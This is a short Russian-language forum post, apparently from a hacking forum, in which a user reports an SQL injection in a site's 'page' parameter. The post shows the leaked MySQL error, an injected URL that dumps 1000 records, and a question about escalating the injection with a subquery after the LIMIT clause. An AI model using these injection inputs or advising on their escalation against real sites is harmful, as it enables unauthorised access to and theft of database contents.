Показать сообщение отдельно
Старый 29.04.2014, 21:03   #3224
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Есть иньекция, как я понял в order by
site.com/index.php?p=news&page=1'
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 50' at line 1:SELECT * FROM `news` WHERE 1 = 1 ORDER BY `id` DESC LIMIT 1', 50
при
site.com/index.php?p=news&page=0,1000%20--%20
успешно отображает первые 1000 записей
Можно ли выполнить подзапрос после order by? Или как то можно по другому раскрутить?
z0mbie вне форума   Ответить с цитированием